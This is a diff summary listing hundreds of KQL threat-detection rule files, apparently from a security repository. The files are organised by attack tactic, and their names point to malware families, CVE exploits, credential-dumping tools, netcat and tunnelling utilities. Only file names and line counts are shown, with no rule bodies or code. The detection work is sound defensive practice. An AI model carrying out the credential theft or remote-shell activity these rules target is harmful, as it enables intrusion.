.../lace_tempest_cobalt_strike_download.kql | 12 + .../lace_tempest_file_indicators.kql | 12 + .../lace_tempest_malware_loader_execution.kql | 12 + .../Execution/lazarus_group_activity.kql | 12 + .../macos_filegrabber_infostealer.kql | 10 + .../Execution/mercury_apt_activity.kql | 10 + ...erafaspex_suspicious_process_execution.kql | 12 + ...storm_log4j_wstomcat_process_execution.kql | 10 + ...ageengine_suspicious_process_execution.kql | 12 + ...nyx_sleet_apt_file_creation_indicators.kql | 12 + ..._mf_ng_exploitation_related_indicators.kql | 12 + .../papercut_mf_ng_potential_exploitation.kql | 12 + ...dstorm_apt_process_activity_indicators.kql | 12 + .../potential_apt10_cloud_hopper_activity.kql | 12 + ...tential_apt_fin7_exploitation_activity.kql | 14 ++ ...nnaissance_powertrash_related_activity.kql | 12 + ...fin7_related_powershell_script_created.kql | 10 + ..._panda_activity_against_australian_gov.kql | 12 + .../potential_baby_shark_malware_activity.kql | 10 + ...otential_blackbyte_ransomware_activity.kql | 10 + ...al_cve_2021_26857_exploitation_attempt.kql | 10 + ...al_cve_2021_40444_exploitation_attempt.kql | 10 + ...space_one_access_remote_code_execution.kql | 14 ++ ...al_cve_2022_29072_exploitation_attempt.kql | 13 + ..._exploitation_fake_wermgr_exe_creation.kql | 10 + ...874_exploitation_fake_wermgr_execution.kql | 12 + ...loitation_uncommon_report_wer_location.kql | 10 + ...ect_os_command_injection_file_creation.kql | 14 ++ .../Execution/potential_emotet_activity.kql | 12 + ...tation_attempt_from_office_application.kql | 10 + ...2024_3094_suspicious_ssh_child_process.kql | 13 + ...uspicious_creation_of_esx_admins_group.kql | 13 + ...tial_goofy_guineapig_backdoor_activity.kql | 12 + ...kabot_activity_lure_document_execution.kql | 12 + .../potential_maze_ransomware_activity.kql | 12 + ...tation_dynamic_compilation_via_csc_exe.kql | 19 ++ .../Execution/potential_qbot_activity.kql | 12 + ...ential_raspberry_robin_dot_ending_file.kql | 10 + ...ential_sap_netweaver_webshell_creation.kql | 14 ++ ..._sap_netweaver_webshell_creation_linux.kql | 14 ++ ..._malware_installation_binary_indicator.kql | 12 + ...e_installation_cli_arguments_indicator.kql | 12 + ..._malware_persistence_service_execution.kql | 10 + .../potential_snatch_ransomware_activity.kql | 12 + .../printernightmare_mimikatz_driver_name.kql | 12 + .../qakbot_uninstaller_execution.kql | 12 + ..._initial_execution_from_external_drive.kql | 12 + ...robin_subsequent_execution_of_commands.kql | 12 + ...revil_kaseya_incident_malware_patterns.kql | 10 + ...orschach_ransomware_execution_activity.kql | 12 + ...nake_malware_installer_name_indicators.kql | 12 + ...e_malware_kernel_driver_file_indicator.kql | 12 + ...are_werfault_persistence_file_creation.kql | 10 + .../Execution/trickbot_malware_activity.kql | 10 + .../tropictrooper_campaign_november_2018.kql | 10 + .../turla_group_lateral_movement.kql | 10 + .../Execution/unc2452_powershell_pattern.kql | 12 + .../unc2452_process_creation_patterns.kql | 10 + ..._barracuda_esg_exploitation_indicators.kql | 12 + ...nc4841_email_exfiltration_file_pattern.kql | 10 + .../unc4841_potential_seaspy_execution.kql | 12 + ...snif_redirection_of_discovery_commands.kql | 13 + .../Execution/zxshell_malware.kql | 12 + ...ackage_malicious_exfiltration_via_curl.kql | 12 + .../funklocker_ransomware_file_creation.kql | 12 + .../Impact/lockergoga_ransomware_activity.kql | 12 + .../potential_conti_ransomware_activity.kql | 12 + .../Impact/potential_dtrack_rat_activity.kql | 12 + ...hell_command_injection_processcreation.kql | 12 + .../atlassian_confluence_cve_2022_26134.kql | 10 + ..._authentication_bypass_cve_2025_57791_.kql | 12 + ...cve_2021_31979_cve_2021_33771_exploits.kql | 12 + ...979_cve_2021_33771_exploits_by_sourgum.kql | 12 + ...e_2024_50623_exploitation_attempt_cleo.kql | 13 + .../Initial Access/dns_rce_cve_2020_1350.kql | 12 + ...oited_cve_2020_10189_zoho_manageengine.kql | 10 + ...ce_cve_2021_26084_exploitation_attempt.kql | 10 + ...28_exploitation_attempt_vmware_horizon.kql | 13 + ...al_cve_2022_26809_exploitation_attempt.kql | 12 + ...empt_of_undocumented_windowsserver_rce.kql | 10 + ...tation_of_goanywhere_mft_vulnerability.kql | 14 ++ ...ve_2025_53770_exploitation_file_create.kql | 12 + ...cve_2025_53770_exploitation_indicators.kql | 12 + .../suspicious_crushftp_child_process.kql | 16 ++ .../wannacry_ransomware_activity.kql | 10 + .../blackbyte_ransomware_registry.kql | 13 + .../Persistence/blue_mockingbird.kql | 10 + ...l_rat_anonymous_user_process_execution.kql | 10 + ...oldsteel_rat_cleanup_command_execution.kql | 12 + ...teel_rat_service_persistence_execution.kql | 12 + ...raversal_webshell_drop_cve_2025_57790_.kql | 12 + ..._suspicious_new_printer_ports_registry.kql | 14 ++ ...eenconnect_path_traversal_exploitation.kql | 13 + .../darkgate_user_created_via_net_exe.kql | 12 + ...oiting_setupcomplete_cmd_cve_2019_1378.kql | 10 + ...eka_backdoor_configuration_persistence.kql | 12 + .../moriya_rootkit_file_created.kql | 10 + .../oceanlotus_registry_activity.kql | 10 + .../outlook_task_note_reminder_received.kql | 12 + .../potential_bearlpe_exploitation.kql | 10 + ...steel_persistence_service_dll_creation.kql | 10 + ...coldsteel_persistence_service_dll_load.kql | 13 + ...otential_coldsteel_rat_file_indicators.kql | 10 + ...al_coldsteel_rat_windows_user_creation.kql | 10 + ...on_hta_file_creation_by_foxitpdfreader.kql | 10 + ...e_2023_36884_exploitation_dropped_file.kql | 10 + ...registry_blob_related_to_snake_malware.kql | 12 + ...tivity_shutdown_schedule_task_creation.kql | 12 + ...otential_netwire_rat_activity_registry.kql | 10 + ...al_notepad_cve_2025_49144_exploitation.kql | 13 + ...al_printnightmare_exploitation_attempt.kql | 10 + ...registry_set_internet_settings_zonemap.kql | 12 + ...ntial_ursnif_malware_activity_registry.kql | 10 + ...reenconnect_user_database_modification.kql | 14 ++ ...xploitation_cve_2021_35211_by_dev_0322.kql | 12 + ...lud_malicious_github_workflow_creation.kql | 12 + ...all_sieve_malware_registry_persistence.kql | 12 + ...nake_malware_covert_store_registry_key.kql | 10 + .../Persistence/sourgum_actor_behaviours.kql | 10 + ...s_printerports_creation_cve_2020_1048_.kql | 12 + ..._spawned_by_centrestack_portal_apppool.kql | 13 + ...spooler_service_suspicious_binary_load.kql | 13 + .../apt27_emissary_panda_activity.kql | 12 + .../chromeloader_malware_execution.kql | 12 + ...user_and_guid_password_cve_2025_57788_.kql | 14 ++ .../defrag_deactivation.kql | 10 + .../exploiting_cve_2019_1388.kql | 10 + ...d_apt_custom_protocol_handler_creation.kql | 14 ++ ...stom_protocol_handler_dll_registry_set.kql | 14 ++ ...hafnium_exchange_exploitation_activity.kql | 12 + ...ss_spawning_rundll32_guloader_activity.kql | 14 ++ ...r_lpe_cve_2021_41379_file_create_event.kql | 12 + .../kapeka_backdoor_autorun_persistence.kql | 10 + .../kapeka_backdoor_persistence_activity.kql | 17 ++ .../leviathan_registry_key_activity.kql | 10 + ...vity_execution_of_more_com_and_vbc_exe.kql | 13 + ..._potential_cve_2025_32463_exploitation.kql | 16 ++ .../oilrig_apt_activity.kql | 12 + .../oilrig_apt_registry_persistence.kql | 12 + .../operation_wocao_activity.kql | 12 + .../pingback_backdoor_activity.kql | 12 + ...pingback_backdoor_dll_loading_activity.kql | 12 + .../pingback_backdoor_file_indicators.kql | 12 + ...otential_actinium_persistence_activity.kql | 12 + ...al_cve_2021_41379_exploitation_attempt.kql | 10 + ...ve_2023_21554_queuejumper_exploitation.kql | 10 + ...l_cve_2024_35250_exploitation_activity.kql | 14 ++ ...hftp_rce_vulnerability_cve_2025_54309_.kql | 12 + ...ot_activity_winlogon_shell_persistence.kql | 13 + .../potential_pikabot_hollowing_activity.kql | 14 ++ .../potential_plugx_activity.kql | 10 + .../potential_ryuk_ransomware_activity.kql | 12 + ...l_systemnightmare_exploitation_attempt.kql | 10 + ...r_payload_execution_via_scheduled_task.kql | 15 ++ ...ll_sieve_malware_commandline_indicator.kql | 12 + .../suspicious_sysmon_as_execution_parent.kql | 10 + .../suspicious_vbscript_un2452_pattern.kql | 10 + .../taidoor_rat_dll_load.kql | 10 + .../turla_group_commands_may_2020.kql | 10 + .../winnti_malware_hk_university_campaign.kql | 12 + .../winnti_pipemon_characteristics.kql | 12 + .../conti_volume_shadow_listing.kql | 10 + .../foggyweb_backdoor_dll_loading.kql | 12 + .../formbook_process_creation.kql | 10 + .../mustang_panda_dropper.kql | 12 + ...ous_word_cab_file_write_cve_2021_40444.kql | 10 + .../clipboard_data_collection_via_pbpaste.kql | 17 ++ ...ed_compressed_file_extraction_via_7zip.kql | 12 + ...suspicious_compression_tool_parameters.kql | 10 + .../Collection/system_drawing_dll_load.kql | 12 + .../curl_exe_execution.kql | 13 + ...rl_exe_execution_with_custom_useragent.kql | 13 + .../file_download_via_curl_exe.kql | 14 ++ ...ion_initiated_from_users_public_folder.kql | 15 ++ ...suspicious_azure_front_door_connection.kql | 15 ++ ...ary_code_execution_and_remote_sessions.kql | 28 +++ ...e_code_tunnel_execution_file_indicator.kql | 13 + ...dential_files_by_uncommon_applications.kql | 18 ++ ...nsitive_files_by_uncommon_applications.kql | 17 ++ ...vol_policies_share_by_uncommon_process.kql | 10 + ..._loaded_by_uncommon_suspicious_process.kql | 16 ++ ...og_query_requests_by_builtin_utilities.kql | 13 + .../Credential Access/pfx_file_creation.kql | 26 ++ ...assword_reconnaissance_via_findstr_exe.kql | 10 + .../unattend_xml_file_access_attempt.kql | 12 + ...eg_hive_files_by_uncommon_applications.kql | 12 + ...ok_mail_files_by_uncommon_applications.kql | 18 ++ .../ads_zone_identifier_deleted.kql | 12 + .../amsi_dll_load_by_uncommon_process.kql | 12 + ...tsproxy_dll_loaded_by_uncommon_process.kql | 14 ++ .../codepage_modification_via_mode_com.kql | 12 + .../diskshadow_child_process_spawned.kql | 12 + .../diskshadow_script_mode_execution.kql | 13 + .../dll_call_by_ordinal_via_rundll32_exe.kql | 13 + ...ork_connection_to_non_local_ip_address.kql | 15 ++ .../dmp_hdmp_file_creation.kql | 12 + ...ic_net_compilation_via_csc_exe_hunting.kql | 12 + ...le_or_folder_permissions_modifications.kql | 13 + ...dless_process_launched_via_conhost_exe.kql | 12 + ..._exe_initiated_http_network_connection.kql | 13 + ..._the_cryptography_powershell_namespace.kql | 15 ++ ...rosoft_office_trusted_location_updated.kql | 12 + .../microsoft_workflow_compiler_execution.kql | 13 + ...initiated_network_connection_over_http.kql | 15 ++ ...cting_package_created_via_iexpress_exe.kql | 15 ++ ...e_added_via_new_netfirewallrule_cmdlet.kql | 13 + ...e_obfuscation_using_unicode_characters.kql | 12 + ...sideloading_activity_via_extexport_exe.kql | 13 + ...on_via_explorer_exe_from_shell_process.kql | 16 ++ ..._execution_from_guid_like_folder_names.kql | 14 ++ ..._the_cryptography_powershell_namespace.kql | 15 ++ ...isterserver_export_function_explicitly.kql | 14 ++ ...rvice_binary_in_user_controlled_folder.kql | 14 ++ ...files_as_system_files_using_attrib_exe.kql | 10 + .../terminate_linux_process_via_kill.kql | 10 + .../use_short_name_path_in_command_line.kql | 19 ++ ..._file_creation_in_codeintegrity_folder.kql | 13 + .../Discovery/cmd_shell_output_redirect.kql | 14 ++ .../Discovery/net_exe_execution.kql | 12 + .../Discovery/process_discovery.kql | 14 ++ .../Discovery/sc_exe_query_execution.kql | 13 + .../suspicious_tasklist_discovery_command.kql | 12 + ...tem_information_discovery_via_wmic_exe.kql | 15 ++ .../arbitrary_command_execution_using_wsl.kql | 14 ++ .../cab_file_extraction_via_wusa_exe.kql | 13 + ...ment_execution_dfsvc_exe_child_process.kql | 12 + ...d_executed_via_run_dialog_box_registry.kql | 14 ++ ...xe_network_connection_to_non_local_ips.kql | 12 + ..._new_module_via_powershell_commandline.kql | 12 + ..._of_script_inside_of_a_compressed_file.kql | 20 ++ .../microsoft_excel_add_in_loaded.kql | 12 + .../microsoft_word_add_in_loaded.kql | 13 + ...ection_initiated_by_powershell_process.kql | 17 ++ ...tware_execution_uc_berkeley_signature_.kql | 14 ++ ...l_file_override_append_via_set_command.kql | 16 ++ ..._suspicious_powershell_child_processes.kql | 14 ++ .../process_execution_from_webdav_share.kql | 16 ++ ...path_configuration_file_creation_linux.kql | 15 ++ ...path_configuration_file_creation_macos.kql | 15 ++ ...th_configuration_file_creation_windows.kql | 15 ++ ...access_tool_ammy_admin_agent_execution.kql | 12 + ...s_tool_cmd_exe_execution_via_anyviewer.kql | 13 + ...nnect_remote_command_execution_hunting.kql | 14 ++ .../scheduled_task_created_filecreation.kql | 12 + .../scheduled_task_created_registry.kql | 12 + ...m_potential_suspicious_parent_location.kql | 14 ++ ...s_new_instance_of_an_office_com_object.kql | 14 ++ .../unusually_long_powershell_commandline.kql | 10 + .../wmi_module_loaded_by_uncommon_process.kql | 10 + ...vbe_file_execution_via_cscript_wscript.kql | 12 + ...connection_open_attempt_via_winscp_cli.kql | 10 + ...tential_data_exfiltration_via_curl_exe.kql | 12 + .../Exfiltration/tunneling_tool_execution.kql | 12 + ...scp_execution_from_non_standard_folder.kql | 10 + .../process_terminated_via_taskkill.kql | 14 ++ .../webdav_temporary_local_file_creation.kql | 12 + .../smb_over_quic_via_net_exe.kql | 12 + .../execution_from_webserver_root_folder.kql | 14 ++ .../shell_context_menu_command_tampering.kql | 12 + ...ted_in_potentially_suspicious_location.kql | 15 ++ .../elevated_system_shell_spawned.kql | 11 + ...tion_of_an_executable_by_an_executable.kql | 14 ++ .../7zip_compressing_dump_files.kql | 13 + ...kerberos_coercion_via_dns_spn_spoofing.kql | 17 ++ .../audio_capture_via_powershell.kql | 12 + .../audio_capture_via_soundrecorder.kql | 12 + .../automated_collection_command_prompt.kql | 10 + .../clipboard_collection_with_xclip_tool.kql | 14 ++ ...lipboard_data_collection_via_osascript.kql | 12 + ...h_password_for_exfiltration_with_7_zip.kql | 12 + ..._password_for_exfiltration_with_winzip.kql | 10 + .../compressed_file_creation_via_tar_exe.kql | 14 ++ ...compressed_file_extraction_via_tar_exe.kql | 14 ++ .../data_copied_to_clipboard_via_clip_exe.kql | 10 + .../esentutl_steals_browser_information.kql | 12 + ...iles_added_to_an_archive_using_rar_exe.kql | 12 + ...ous_output_via_compress_archive_cmdlet.kql | 12 + .../Collection/gui_input_capture_macos.kql | 12 + .../Collection/hacktool_adcspwn_execution.kql | 12 + .../hacktool_impacket_tools_execution.kql | 12 + ...ckup_for_system_registry_hives_enabled.kql | 14 ++ ...ential_smb_relay_attack_tool_execution.kql | 12 + ...tial_suspicious_activity_using_secedit.kql | 12 + ...owershell_get_clipboard_cmdlet_via_cli.kql | 10 + ...es_accessing_the_microphone_and_webcam.kql | 10 + ...ge_with_password_and_compression_level.kql | 13 + ...rmation_for_export_with_command_prompt.kql | 10 + .../screen_capture_activity_via_psr_exe.kql | 10 + KQL/rules/Collection/screen_capture_macos.kql | 12 + ...uspicious_camera_and_microphone_access.kql | 12 + ...lation_of_default_accounts_via_net_exe.kql | 12 + ...veeam_backup_database_suspicious_query.kql | 10 + ...tabase_credentials_dump_via_sqlcmd_exe.kql | 10 + ...ed_disableaidataanalysis_value_deleted.kql | 15 ++ ...indows_recall_feature_enabled_registry.kql | 15 ++ ...ows_recall_feature_enabled_via_reg_exe.kql | 16 ++ .../winrar_compressing_dump_files.kql | 13 + ...inrar_execution_in_non_standard_folder.kql | 12 + ...i_cache_file_creation_by_uncommon_tool.kql | 12 + .../anydesk_temporary_artefact.kql | 15 ++ ...le_download_via_gfxdownloadwrapper_exe.kql | 10 + .../cloudflared_portable_execution.kql | 13 + .../cloudflared_quick_tunnel_execution.kql | 15 ++ ...cloudflared_tunnel_connections_cleanup.kql | 12 + .../cloudflared_tunnel_execution.kql | 12 + ...localtonet_tunneling_service_initiated.kql | 15 ++ ...onet_tunneling_service_initiated_linux.kql | 15 ++ .../curl_usage_on_linux.kql | 13 + ...entially_suspicious_directory_via_wget.kql | 10 + ..._download_and_execution_via_ieexec_exe.kql | 10 + ...ad_from_browser_process_via_inline_url.kql | 10 + ...nload_from_ip_based_url_via_certoc_exe.kql | 10 + ...ile_download_using_notepad_gup_utility.kql | 12 + .../file_download_via_certoc_exe.kql | 10 + .../finger_exe_execution.kql | 15 ++ ...assist_temporary_installation_artefact.kql | 15 ++ .../gzip_archive_decode_via_powershell.kql | 12 + .../hacktool_htran_natbypass_execution.kql | 10 + .../hacktool_inveigh_execution_artefacts.kql | 12 + ...b_relay_secrets_dump_module_indicators.kql | 12 + .../hacktool_sharpchisel_execution.kql | 12 + ...hacktool_silenttrinity_stager_dll_load.kql | 12 + ...acktool_silenttrinity_stager_execution.kql | 12 + ...ck_legit_rdp_session_to_move_laterally.kql | 12 + ...interchange_format_file_via_ldifde_exe.kql | 13 + .../installation_of_teamviewer_desktop.kql | 10 + ...ection_initiated_by_script_interpreter.kql | 13 + ...vestandaloneupdater_exe_proxy_download.kql | 12 + ...stsc_exe_execution_with_local_rdp_file.kql | 12 + ...m_process_located_in_suspicious_folder.kql | 12 + ...ication_initiated_to_portmap_io_domain.kql | 12 + ...k_connection_initiated_by_imewdbld_exe.kql | 11 + ...tially_suspicious_or_uncommon_location.kql | 11 + ...urewebsites_net_by_non_browser_process.kql | 11 + ...to_potential_dead_drop_resolver_domain.kql | 15 ++ ...ection_initiated_by_script_interpreter.kql | 12 + .../port_forwarding_activity_via_ssh_exe.kql | 12 + .../potential_amazon_ssm_agent_hijacking.kql | 12 + ...ownload_cradles_usage_process_creation.kql | 12 + ...nload_via_powershell_invoke_webrequest.kql | 10 + ...oad_upload_activity_using_type_command.kql | 10 + ...emory_download_and_compile_of_payloads.kql | 10 + ...ntial_linux_amazon_ssm_agent_hijacking.kql | 12 + .../potential_rdp_tunneling_via_plink.kql | 10 + .../potential_rdp_tunneling_via_ssh.kql | 10 + ...tential_wizardupdate_malware_infection.kql | 10 + .../potential_xcsset_malware_infection.kql | 10 + ...cious_network_connection_to_notion_api.kql | 12 + .../potentially_suspicious_usage_of_qemu.kql | 12 + .../printbrm_zip_creation_of_extraction.kql | 10 + .../pua_3proxy_execution.kql | 12 + .../pua_chisel_tunneling_tool_execution.kql | 12 + .../pua_fast_reverse_proxy_frp_execution.kql | 12 + .../pua_iox_tunneling_tool_execution.kql | 12 + .../pua_netcat_suspicious_execution.kql | 12 + .../pua_ngrok_execution.kql | 15 ++ .../pua_nimgrab_execution.kql | 12 + .../pua_nps_tunneling_tool_execution.kql | 12 + .../quickassist_execution.kql | 13 + .../rdp_over_reverse_ssh_tunnel.kql | 10 + .../rdp_to_http_or_https_target_ports.kql | 10 + .../remote_access_tool_anydesk_execution.kql | 15 ++ ...ydesk_execution_from_suspicious_folder.kql | 15 ++ ...ss_tool_anydesk_piped_password_via_cli.kql | 13 + ...ccess_tool_anydesk_silent_installation.kql | 12 + ...emote_access_tool_gotoassist_execution.kql | 15 ++ .../remote_access_tool_logmein_execution.kql | 15 ++ ...gent_command_execution_via_meshcentral.kql | 14 ++ ...emote_access_tool_netsupport_execution.kql | 15 ++ ...ol_potential_meshagent_execution_macos.kql | 15 ++ ..._potential_meshagent_execution_windows.kql | 15 ++ ...tool_renamed_meshagent_execution_macos.kql | 13 + ...ol_renamed_meshagent_execution_windows.kql | 13 + ...te_access_tool_screenconnect_execution.kql | 15 ++ ...al_suspicious_remote_command_execution.kql | 13 + ...mote_access_tool_simple_help_execution.kql | 15 ++ ...potentially_attacker_controlled_server.kql | 15 ++ ...mote_access_tool_ultraviewer_execution.kql | 15 ++ ...download_via_desktopimgdownldr_utility.kql | 10 + .../renamed_cloudflared_exe_execution.kql | 10 + ...ed_visual_studio_code_tunnel_execution.kql | 10 + ...e_code_tunnel_execution_file_indicator.kql | 11 + .../Command and Control/replace_exe_usage.kql | 10 + ...onnect_temporary_installation_artefact.kql | 15 ++ .../suspicious_binary_writes_via_anydesk.kql | 13 + ...suspicious_certreq_command_to_download.kql | 15 ++ ...d_process_of_manage_engine_servicedesk.kql | 12 + ...spicious_curl_change_user_agents_linux.kql | 13 + .../suspicious_curl_exe_download.kql | 10 + .../suspicious_desktopimgdownldr_command.kql | 12 + ...spicious_desktopimgdownldr_target_file.kql | 12 + ..._download_and_compress_into_a_cab_file.kql | 10 + ...suspicious_download_from_office_domain.kql | 12 + .../suspicious_dropbox_api_usage.kql | 12 + .../suspicious_extrac32_execution.kql | 10 + ...usage_on_gzip_archive_process_creation.kql | 12 + ...suspicious_invoke_webrequest_execution.kql | 10 + ...oke_webrequest_execution_with_directip.kql | 10 + ...stsc_exe_execution_with_local_rdp_file.kql | 12 + ..._network_communication_with_google_api.kql | 13 + ...etwork_communication_with_telegram_api.kql | 12 + .../suspicious_plink_port_forwarding.kql | 12 + .../suspicious_tscon_start_as_system.kql | 10 + .../suspicious_velociraptor_child_process.kql | 12 + .../teamviewer_remote_session.kql | 12 + .../tor_client_browser_execution.kql | 10 + ...k_connection_initiated_by_certutil_exe.kql | 12 + ...use_of_ultravnc_remote_access_software.kql | 12 + .../visual_studio_code_tunnel_execution.kql | 12 + ...tudio_code_tunnel_remote_file_creation.kql | 11 + ...tudio_code_tunnel_service_installation.kql | 12 + ...ual_studio_code_tunnel_shell_execution.kql | 12 + .../wget_creating_files_in_tmp_directory.kql | 12 + ...rency_wallets_by_uncommon_applications.kql | 17 ++ ..._sysvol_files_by_uncommon_applications.kql | 10 + ..._history_file_by_uncommon_applications.kql | 12 + ...i_master_keys_by_uncommon_applications.kql | 12 + .../browser_started_with_remote_debugging.kql | 10 + .../capture_credentials_with_rpcping_exe.kql | 12 + .../certificate_exported_via_powershell.kql | 12 + ...mp_files_from_remote_share_via_cmd_exe.kql | 10 + .../copy_passwd_or_shadow_from_tmp_path.kql | 10 + ...g_sensitive_files_with_credential_data.kql | 12 + .../cred_dump_tools_dropped_files.kql | 12 + ...anager_access_by_uncommon_applications.kql | 14 ++ ...dentials_from_password_stores_keychain.kql | 12 + .../credentials_in_files.kql | 10 + .../credui_dll_loaded_by_uncommon_process.kql | 12 + ...ys_and_certificate_export_activity_ioc.kql | 13 + ...dumping_of_sensitive_hives_via_reg_exe.kql | 12 + .../dumping_process_via_sqldumper_exe.kql | 12 + ...umeration_for_3rd_party_creds_from_cli.kql | 10 + ...numeration_for_credentials_in_registry.kql | 13 + .../esentutl_gather_credentials.kql | 12 + ...entutl_volume_shadow_copy_service_keys.kql | 10 + ...ccess_of_signal_desktop_sensitive_data.kql | 16 ++ .../findstr_gpp_passwords.kql | 10 + .../hacktool_crackmapexec_file_indicators.kql | 10 + ...hacktool_crackmapexec_process_patterns.kql | 10 + ...ol_dumpert_process_dumper_default_file.kql | 12 + ...ktool_dumpert_process_dumper_execution.kql | 12 + .../hacktool_execution_pe_metadata.kql | 12 + ...ool_hashcat_password_cracker_execution.kql | 12 + ...ol_hydra_password_bruteforce_execution.kql | 12 + .../hacktool_impacket_file_indicators.kql | 10 + .../hacktool_inveigh_execution.kql | 12 + .../hacktool_krbrelay_execution.kql | 12 + .../hacktool_lazagne_execution.kql | 14 ++ .../hacktool_mimikatz_execution.kql | 12 + .../hacktool_mimikatz_kirbi_file_creation.kql | 12 + .../hacktool_nppspy_hacktool_usage.kql | 10 + ...a_crackmapexec_or_impacket_secretsdump.kql | 10 + ..._pypykatz_credentials_dumping_activity.kql | 10 + .../hacktool_quarks_pwdump_execution.kql | 12 + .../hacktool_quarkspwdump_dump_file.kql | 10 + .../hacktool_remotekrbrelay_execution.kql | 13 + .../hacktool_safetykatz_dump_indicator.kql | 12 + .../hacktool_safetykatz_execution.kql | 12 + .../hacktool_securityxploded_execution.kql | 12 + ..._typical_hivenightmare_sam_file_export.kql | 12 + .../hacktool_winpwn_execution.kql | 11 + ...resting_service_enumeration_via_sc_exe.kql | 12 + ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 12 + ...ed_module_enumeration_via_tasklist_exe.kql | 13 + .../lsass_dump_keyword_in_commandline.kql | 13 + ...request_via_dumptype_registry_settings.kql | 12 + ...ess_dump_artefact_in_crashdumps_folder.kql | 12 + ...s_memory_dump_creation_via_taskmgr_exe.kql | 12 + .../lsass_process_memory_dump_files.kql | 10 + ...process_reconnaissance_via_findstr_exe.kql | 10 + ...soft_iis_connection_strings_decryption.kql | 10 + ...ft_iis_service_account_password_dumped.kql | 10 + ...e_file_access_by_uncommon_applications.kql | 11 + ...mount_execution_with_hidepid_parameter.kql | 10 + ...neric_credentials_added_via_cmdkey_exe.kql | 14 ++ .../Credential Access/ntds_dit_created.kql | 10 + ...it_creation_by_uncommon_parent_process.kql | 10 + .../ntds_dit_creation_by_uncommon_process.kql | 10 + .../ntds_exfiltration_filename_patterns.kql | 10 + ...uration_reconnaissance_via_findstr_exe.kql | 12 + .../potential_browser_data_stealing.kql | 13 + ..._attempt_using_new_networkprovider_cli.kql | 12 + ..._attempt_using_new_networkprovider_reg.kql | 12 + ...ential_dumping_via_lsass_process_clone.kql | 10 + ..._via_lsass_silentprocessexit_technique.kql | 12 + .../potential_credential_dumping_via_wer.kql | 12 + ..._sniffing_activity_using_network_tools.kql | 15 ++ ...istory_access_attempt_via_history_file.kql | 14 ++ ..._for_cached_credentials_via_cmdkey_exe.kql | 12 + .../potential_sam_database_dump.kql | 12 + ...tential_spn_enumeration_via_setspn_exe.kql | 12 + ...fender_av_bypass_via_dump64_exe_rename.kql | 12 + ...ommand_targeting_teams_sensitive_files.kql | 12 + ...con_activity_using_log_query_utilities.kql | 14 ++ ...ly_suspicious_jwt_token_search_via_cli.kql | 13 + ...ally_suspicious_odbc_driver_registered.kql | 12 + .../powershell_get_process_lsass.kql | 10 + .../Credential Access/powershell_sam_copy.kql | 13 + ...s_reconnaissance_via_commandline_tools.kql | 10 + ...rocess_memory_dump_via_rdrleakdiag_exe.kql | 12 + .../pua_dit_snapshot_viewer.kql | 12 + .../pua_mouse_lock_execution.kql | 12 + .../pua_webbrowserpassview_execution.kql | 12 + ...stry_export_of_third_party_credentials.kql | 12 + .../renamed_browsercore_exe_execution.kql | 10 + .../sensitive_file_dump_via_wbadmin_exe.kql | 14 ++ ...e_recovery_from_backup_via_wbadmin_exe.kql | 12 + ...tion_using_operating_systems_utilities.kql | 12 + ...sqlite_chromium_profile_data_db_access.kql | 10 + .../sqlite_firefox_profile_data_db_access.kql | 10 + ...e_access_to_browser_credential_storage.kql | 17 ++ .../suspicious_history_file_operations.kql | 13 + .../suspicious_key_manager_access.kql | 12 + ...icious_process_patterns_ntds_dit_exfil.kql | 10 + .../suspicious_reg_add_open_command.kql | 10 + .../suspicious_serv_u_process_pattern.kql | 12 + ...uspicious_system_user_process_creation.kql | 14 ++ ...ious_sysvol_domain_group_policy_access.kql | 12 + ..._application_related_objectacess_event.kql | 10 + ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 13 + ...shadowcopy_symlink_creation_via_mklink.kql | 12 + .../wce_wceaux_dll_access.kql | 10 + .../werfault_lsass_process_memory_dump.kql | 10 + .../windows_credential_editor_registry.kql | 10 + ...credential_manager_access_via_vaultcmd.kql | 10 + ...p_file_created_by_uncommon_application.kql | 11 + ...rivilege_by_arbitrary_parent_processes.kql | 10 + .../abusing_print_executable.kql | 10 + ...add_insecure_download_source_to_winget.kql | 14 ++ .../add_new_download_source_to_winget.kql | 12 + ...spicious_new_download_source_to_winget.kql | 10 + .../add_safeboot_keys_via_reg_utility.kql | 12 + ..._exe_execution_from_uncommon_directory.kql | 10 + ...tifier_deleted_by_uncommon_application.kql | 12 + .../agentexecutor_powershell_execution.kql | 12 + ...levated_msi_spawned_cmd_and_powershell.kql | 10 + ...ays_install_elevated_windows_installer.kql | 14 ++ .../amsi_dll_loaded_via_lolbin_process.kql | 10 + ...river_disallowed_on_dev_drive_registry.kql | 13 + ...r_csproj_code_execution_via_dotnet_exe.kql | 12 + ...bitrary_file_download_via_imewdbld_exe.kql | 10 + ...ary_file_download_via_msedge_proxy_exe.kql | 10 + ...bitrary_file_download_via_msohtmed_exe.kql | 10 + .../arbitrary_file_download_via_mspub_exe.kql | 10 + ...file_download_via_presentationhost_exe.kql | 10 + ...bitrary_file_download_via_squirrel_exe.kql | 13 + ...work_service_potential_dll_sideloading.kql | 10 + .../aspnetcompiler_execution.kql | 10 + ...sembly_loading_via_cl_loadassembly_ps1.kql | 10 + .../audit_policy_tampering_via_auditpol.kql | 14 ++ ...tampering_via_nt_resource_kit_auditpol.kql | 14 ++ .../audit_rules_deleted_via_auditctl.kql | 15 ++ ...bs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql | 12 + ...d_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql | 12 + .../baaupdate_exe_suspicious_dll_load.kql | 13 + ...cial_processes_with_improper_arguments.kql | 15 ++ ...64_encoded_powershell_command_detected.kql | 12 + .../Defense Evasion/binary_padding_macos.kql | 12 + .../bitlockertogo_exe_execution.kql | 16 ++ .../browser_execution_in_headless_mode.kql | 10 + .../bypass_uac_via_fodhelper_exe.kql | 12 + .../c_il_code_compilation_via_ilasm_exe.kql | 10 + .../certificate_exported_via_certutil_exe.kql | 12 + ...channel_access_permission_via_registry.kql | 10 + .../chmod_suspicious_directory.kql | 12 + .../Defense Evasion/clear_linux_logs.kql | 12 + .../cmstp_execution_process_creation.kql | 12 + .../cmstp_execution_registry_event.kql | 12 + .../cobaltstrike_load_by_rundll32.kql | 10 + .../code_execution_via_pcwutl_dll.kql | 12 + ...ation_via_mode_com_to_russian_language.kql | 14 ++ .../com_object_execution_via_xwizard_exe.kql | 12 + .../Defense Evasion/connection_proxy.kql | 12 + ...urestring_cmdlet_usage_via_commandline.kql | 12 + .../createdump_process_dump.kql | 12 + .../creation_of_non_existent_system_dll.kql | 12 + .../curl_download_and_execute_combination.kql | 10 + 